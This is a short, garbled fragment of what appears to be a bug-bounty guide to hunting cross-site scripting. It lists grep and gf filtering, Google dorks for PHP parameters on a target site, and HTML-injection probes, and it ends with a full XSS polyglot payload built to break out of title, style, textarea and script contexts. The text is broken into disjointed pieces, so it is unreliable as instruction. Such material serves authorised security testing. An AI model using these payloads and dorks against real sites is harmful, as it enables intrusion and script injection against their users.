grep "="
or gf patterns and store it in a new file.site:target.com
filter the resultsite:target.com inurl:".php?"
or site:target.com filetype:php
etc you can find some dorks at this link https://www.openbugbounty.org/blog/devl00p/top-100-xss-dorks/ or google it out.var=
, =""
, =''
.https://example.com?hiddenvariablename=xss
.<a href=#>test</a>
an entity in<
)<
and >
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>